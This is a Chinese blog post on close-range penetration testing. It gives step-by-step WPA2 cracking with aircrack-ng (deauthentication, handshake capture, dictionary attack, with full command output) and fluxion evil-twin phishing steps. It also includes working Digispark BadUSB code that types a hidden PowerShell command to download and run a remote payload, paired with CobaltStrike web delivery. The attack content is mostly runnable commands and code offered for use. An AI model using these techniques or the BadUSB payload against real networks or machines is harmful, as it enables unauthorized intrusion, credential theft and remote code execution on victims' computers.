近源渗透测试

已于 2022-04-10 13:32:53 修改
阅读量3.9k 收藏 11
点赞数 2
分类专栏: 小计 文章标签: 安全 web安全 网络 渗透测试
于 2022-01-28 21:20:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45161658/article/details/122736729
版权

🌕写在前面

  • 🍊博客主页:Scorpio_m7
  • 🎉欢迎关注🔎点赞👍收藏⭐️留言📝
  • 🌟本文由 Scorpio_m7原创,CSDN首发!
  • 📆首发时间:🌹2022年1月28日🌹
  • ✉️坚持和努力一定能换来诗与远方!
  • 🙏作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢!

文章目录

wifi渗透

Wifi密码爆破

利用在线密码生成1.txt字典,使用kail中自带的Aircrack-ng,首先查看无线网卡的信息

root@kali:~# iwconfig 
lo        no wireless extensions.
eth0      no wireless extensions.
wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

kill掉可能影响的进程airmon-ng check kill。启用无线网卡的监听模式airmon-ng start wlan0。启用成功后,Ifconfig可以看到无线网卡的信息。通过airodump-ng wlan0mon监听附近的所有wifi通信,确定目标后可以退出。通过后台持续运行airodump-ng --bssid F6:4C:A1:B5:C6:81 -c 10 -w test wlan0mon抓取指定ap的无线通信,这里-c指定对应通道。然后攻击指定的无线客户端及路由器,以获取握手包

root@kali:~# aireplay-ng -0 2 -a F6:4C:A1:B5:C6:81 -c 20:64:CB:0E:E3:ED wlan0mon
14:52:26  Waiting for beacon frame (BSSID: F6:4C:A1:B5:C6:81) on channel 11
14:52:26  Sending 64 directed DeAuth (code 7). STMAC: [20:64:CB:0E:E3:ED] [ 1|62 ACKs]
14:52:27  Sending 64 directed DeAuth (code 7). STMAC: [20:64:CB:0E:E3:ED] [ 0|65 ACKs]

查看后台运行的监听进程,抓到数据包为成功

root@kali:~# airodump-ng --bssid F6:4C:A1:B5:C6:81 -c 11 -w test wlan0mon
14:50:39  Created capture file "test-01.cap".
 CH 11 ][ Elapsed: 12 mins ][ 2021-10-26 15:03 ][ WPA handshake: F6:4C:A1:B5:C6:81 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 F6:4C:A1:B5:C6:81  -25  27     6548       59    0  11  360   WPA2 CCMP   PSK  DESKTOP-ATOB8DH 5656                                      
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
 F6:4C:A1:B5:C6:81  20:64:CB:0E:E3:ED   -1    1e- 0      0       51

通过碰撞破解握手包的密码,获取wifi密码

root@kali:~# aircrack-ng -w 1.txt test-01.cap 
Reading packets, please wait...
Opening test-01.cap
Read 3938 packets.
   #  BSSID              ESSID                     Encryption
   1  F6:4C:A1:B5:C6:81  DESKTOP-ATOB8DH 5656      WPA (1 handshake)
Choosing first network as target.
Reading packets, please wait...
Opening test-01.cap
Read 3938 packets.
1 potential targets
                               Aircrack-ng 1.6 
      [00:00:00] 1/1 keys tested (25.69 k/s) 
      Time left: --
                           KEY FOUND! [ 12345678 ]
      Master Key     : 53 CB 0A A3 F1 FD 34 35 78 A6 C9 FF 24 FC E6 77 
                       02 21 79 8F 36 A9 31 47 7E 33 E6 A8 F0 34 E5 3F 
      Transient Key  : C7 D1 DD 3D D2 CB 16 34 55 C7 CC 92 6C F8 0C 24 
                       C0 27 A2 2C BA 55 8E 44 A9 5D 05 B9 23 1A 04 0D 
                       BF DD 92 F1 EE 03 8A A3 3E D4 21 90 43 E7 8F 53 
                       01 B4 A6 58 D0 49 D1 6B 0B 8E 0B CD 32 EE C8 EA 
      EAPOL HMAC     : 77 E9 ED 54 77 B7 65 99 D5 B2 01 8B 3F 88 58 66

WIFI钓鱼

使用fluxion工具,首先iwconfig查看无线网卡的信息,然后fluxion -i安装依赖

  1. 首先获取目标握手包

    [2] Handshake Snooper 检索WPA/WPA2加密散列。
[3] 扫描所有信道  (2.4GHz & 5Ghz)
[2] 跳过
[2] aireplay-ng 解除认证方式 (侵略性)
[2] cowpatty 验证 (推荐用这个)
[1] 每30秒钟 (推荐).
[2] Synchronously (推荐).

  2. 之后泛洪攻击目标ap,使其停止无线服务

    [1] 选择启动攻击方式
[1] 专属门户 创建一个“邪恶的双胞胎”接入点
[2] 跳过
[2] wlan0    [*] Ralink Technology, Corp. RT2870/RT3070      
[2] aireplay
[1] 流氓 AP - hostapd (推荐)
[1] hash - cowpatty
[1] 使用抓取到的hash文件
[2] cowpatty 验证 (推荐用这个)

  3. 通过钓鱼框架,伪造目标网络信息,诱导用户连接

    [1] 创建SSL证书
[2] 仿真
[03] 通用认证网页                              Chinese

  4. 用户连接钓鱼wifi后,将捕获的用户输入的握手包,与之前认证的握手包进行校验;如果校验成功,则停止攻击目标ap ,否则继续攻击,直至成功破解

无线路由器漏洞利用

RouterSploit它包含了27+个品牌的上百种漏洞利用模块,涉及的路由器、摄像头等设备有几百种。可自动设别设备型号自动扫描可利用的漏洞。

badusb

工具准备

digispark开发板。淘宝链接:https://m.tb.cn/h.fe2pxMT?sm=0b41c0

安装 arduino 的 IDE

https://downloads.arduino.cc/arduino-1.8.13-windows.exe

驱动安装

如果是 64 位操作系统请选择 DPinst 64 .exe ,否则请选择 DPinst.exe

配置环境

查看链接完成配置,烧录代码:https://www.cnblogs.com/qianxiao996/p/13574566.html

#include "DigiKeyboard.h"
void setup() {
  // put your setup code here, to run once:
  DigiKeyboard.delay(2000);//为等待2秒
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);//发送win+R
  DigiKeyboard.delay(800);
  //DigiKeyboard.println("cmd /T:01 /K mode CON: COLS=16 LINES=1");//将cmd窗口最小化保证隐蔽性
  DigiKeyboard.delay(2000);
  DigiKeyboard.println(F("powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://ip:80/a');"));//要执行的payload
  //DigiKeyboard.println("echo set-alias -name rookie -value Invoke-Expression;rookie(new-object net.webclient).downloadstring('http://ip:80/a') | powershell -");
  DigiKeyboard.delay(10000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  //DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT);//执行完成后alt+F4关闭窗口
  DigiKeyboard.delay(10000);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);//发送win+R
}

void loop() {
  // put your main code here, to run repeatedly:
}

功能是下载打开windwos+r 运行窗口,输入命令执行。点击上传,在60s之内插入你的badusb。

img

CobaltStrike生成木马

attacks->webdrive-by->scrpited web deliver->设置监听->生成命令复制到代码中

badusb其他制作方式https://mrxn.net/jswz/diy-myself-badusb.html

Scorpio-m7
关注
  • 2
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
11.7. 近源渗透
Sumarua的博客
08-05 1858
文章目录11.7. 近源渗透11.7.1. USB攻击11.7.1.1. BadUSB11.7.1.2. AutoRUN11.7.1.3. USB Killer11.7.1.4. 侧信道11.7.2. Wi-Fi11.7.2.1. 密码爆破11.7.2.2. 信号压制11.7.3. 门禁11.7.3.1. 电磁脉冲11.7.3.2. IC卡11.7.4. 参考链接 11.7. 近源渗透 11.7.1. USB攻击 11.7.1.1. BadUSB 通过重新编程USB设备的内部微控制器,来执行恶意操作,例如注
kali破解wifi密码
Yama的博客
04-30 1021
airmon-ng airmon-ng: wifi密码破解 思路:开启监听 挤掉热点,监听帐号密码 查看网卡是否支持监听模式(用root权限执行) └─# airmon-ng PHY Interface Driver Chipset phy0 wlan0 iwlwifi Intel Corporation Cannon Lake PCH CNVi WiFi (rev 10) 出现wlan0 表示支持,没出现就表示不支持 激活无线网卡,开启监听模式 # 激活命令 airmo
应急响应靶场(近源渗透OS-1、挖矿事件)
weixin_64815500的博客
06-18 940
知攻善防公众号应急相应靶场练习之 近源渗透os-1以及挖矿事件的题解随笔
近源社工-校内网渗透测试
qq_49869351的博客
09-29 1902
“每一个不起舞的日子 都是对生命的辜负” 初出茅庐,文笔和思路都有晦涩,有不足处还希望师傅们斧正,也欢迎萌新成为网安爱好者,一起进步。 一个风和日丽的晚上,去图书馆借书,大准备修身养性,却在登记时看到了学校图书管理系统,啪的一下,很快啊!看到了浏览器标题栏192.168开头内网的地址。一个宏伟的计划便在心中萌芽了起来。 声明!已在校方知情的情况下进行测试,本文仅供学习交流,所有涉及安全方面的主机与程序均已补丁,穿透出公网的地址端口已销毁,如有滥用,与作者无关! 我们学校算是十里八乡比较大的,校园设施也比较
近源渗透学习
tomyyyyy
05-07 1366
一、近源渗透 近源渗透测试网络空间安全领域逐渐兴起的一种新的安全评估手段。 它是一种集常规网络攻防、物理接近、社会工程学及无线电通信攻防等能力于一体的高规格网络安全评估行动。网络安全评估小组在签订渗透测试授权协议后,通过乔装、社工等方式实地物理侵入企业办公区域,通过其内部各种潜在攻击面(如Wi-Fi网络、RFID门禁、暴露的有线网口、USB接口等)获得“战果”,最后以隐秘的方式将评估结果带出上...
红蓝对抗中的近源渗透
weixin_46236101的博客
09-24 4292
前言 近源渗透是这两年常被安全业内人员谈起的热门话题。不同于其他虚无缥缈的安全概念,近源渗透涉及到的无线安全、物理安全、社会工程学都十分容易落地实践,许多企业内部的攻防对抗演练也都出现了看上去“很过分”的近源渗透攻击手法,给防守方团队上了生动的一课。 19年的时候,笔者和朋友们就推出了漫画《黑客特战队·近源渗透》和出版书《黑客大揭秘:近源渗透测试》。作为近源渗透概念的主力“炒作者”之一,这篇文章和大家聊聊我对近源渗透的理解。 01 什么是红蓝对抗 红蓝对抗原本是一个军事概念,指在部队模拟对抗时,专门成立一个
近源渗透从监控系统到机房再到教育局网络安全
2301_79475922的博客
09-02 402
监控室的位置居花某所知是在1楼的位置,每次放学都会路过,但是记不清是几号了,微机室的位置是在2楼,同样记不清号是20几了,而1楼和2楼同样分布有大量的教室和办公室,所以网络分布还是很杂的,但同时这两个也是比较好分辨的,办公室的计算机通常来说没人用会关机,教室里就更不用说了上面花某也说过每个教室联网的可能就只有一个电子黑板了,而放学后会关机下网,所以说除去办公室和教室放假已下网的设备,像监控室和服务器这类上网设备还是比较简单扫出来的。没胆量也违法,所以只能搞近源。也是最麻烦的,也是我拖了这么久的主要原因。
红蓝对抗之近源渗透.pdf
09-18
在《黑客大揭秘:近源渗透测试》一书中,近源渗透被定义为一种测试人员接近目标进行的渗透测试方式,涵盖了无线安全、物理安全和社会工程学等多个方面。无线上,如Wi-Fi、蓝牙、RFID、ZigBee等物联网通信技术都可能...
渗透测试环境部署DVWA
10-29
在部署DVWA进行渗透测试环境的过程中,首先需要下载并解压DVWA的源代码,这个压缩包文件名为"DVWA-master"。这个文件通常包含以下组成部分: 1. **源代码**:DVWA的PHP源代码,用于构建脆弱的应用程序。这些代码中...
微信小程序客户端渗透测试
03-14
我们将从客户端和服务器两个层面学习微信小程序渗透测试。 客户端方面,主要是对微信小程序进行反编译,得到源代码,检测源代码的保护强度以及是否存在信息泄露,如密钥硬编码等。 在服务端层面,主要是依据微信...
渗透学习测试网站源码打包带走
05-24
渗透学习测试网站源码打包带走。asp+access注入源码;cookie注入源码;DVWA漏洞平台测试源码;ewebeditor;fck漏洞源码;fck突破“_”源码;iis6.0解析漏洞源码;phpcms2008;php包含漏洞源码;WEBSHELL箱子系统V2.0...
近源渗透之红队视角WiFi.pdf
03-24
无线网络已经事实上成为了企业移动化办公的重 要基础设施,但由于普遍缺乏有效的管理,部署与 使用人员的安全意识和专业知识的不足,导致AP分 布混乱,设备安全性脆弱,无线网络也越来越多的 成为黑客入侵企业内网系统的突破口,由此给企业 带来新的安全威胁。
近源渗透之红队视角WiFi.pptx
09-09
近源渗透之红队视角WiFi
机顶盒(酒店,家用)渗透测试总结
01-06
机顶盒(酒店,家用)渗透测试总结 0x01 写在前面 今天是劳动节的最后一天,劳动节几天给自己放个假,今天终于可以闲下来,记录一下以前给某移做的酒店机顶盒的渗透测试,机顶盒的渗透测试也给我提升了很多的思路,同时也发现了很多机顶盒存在的漏洞风险,希望大家在酒店居住的时候,在不用的时候,尽量把电源关了。 此篇全程干货,请诸位认真看。 0x02 工具 酒店机顶盒 智慧机顶盒是某某物联网公司推出的一款搭载安卓系统的酒店智能终端设备。除了具备传统的电视机顶盒功能之外,还具备酒店应用管理系统功能,可应用于酒店、旅馆等服务场景。 显示器 用于接机顶盒用的 装有burpsuite等常用工具的笔记本 渗透用的
网络渗透测试环境安装包
01-14
安装完成后,用户就可以在phpStudy的管理界面中创建虚拟主机,指向DVWA或Mutillidae的源代码目录,从而开始渗透测试的学习和实践。 总结来说,这个"网络渗透测试环境安装包"为网络安全专业人士提供了一个完整的测试...
一次近源渗透
2301_80127209的博客
03-12 454
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
9.7. 近源渗透
Sumarua的博客
07-31 854
文章目录9.7. 近源渗透9.7.1. Bad USB9.7.2. wifi9.7.3. 无线 9.7. 近源渗透 9.7.1. Bad USB WiFiDuck Keystroke injection attack plattform BadUSB code badusb的一些利用方式及代码 WHID WiFi HID Injector - An USB Rubberducky / BadUSB On Steroids BadUSB cable based on Attiny85 microcontro
近源渗透简介
最新发布
2301_80361487的博客
07-15 547
通过乔装、社工等方式实地物理侵入企业办公区域,通过其内部各种潜在攻击面(如Wi-Fi网络、RFID门禁、暴露的有线网口、USB接口等)获得“战果”,最后以隐秘的方式将评估结果带出上报,由此证明企业安全防护存在漏洞。
警惕!攻防演练中的近源渗透
andre1918的博客
02-28 421
不同于通过有线网络进行安全性检测的传统方式,近源渗透测试是指测试人员靠近或位于测试目标建筑内部,利用各类无线通信技术、物理接口和智能设备进行渗透测试。 在传统的网络测试中,各类防火墙、入侵检测工具等防护方案已经较为成熟,测试人员很难通过外网及其他有线网络入口突破企业的重要防御。而在近源渗透测试的场景中,测试人员位于目标企业附近甚至内部,这些地方往往可以发现大量被企业忽视的安全脆弱点。结合近源渗透的相关测试方法,测试人员可以轻易突破安全防线进入企业内网,威胁企业关键系统及敏感业务信息安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Scorpio-m7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值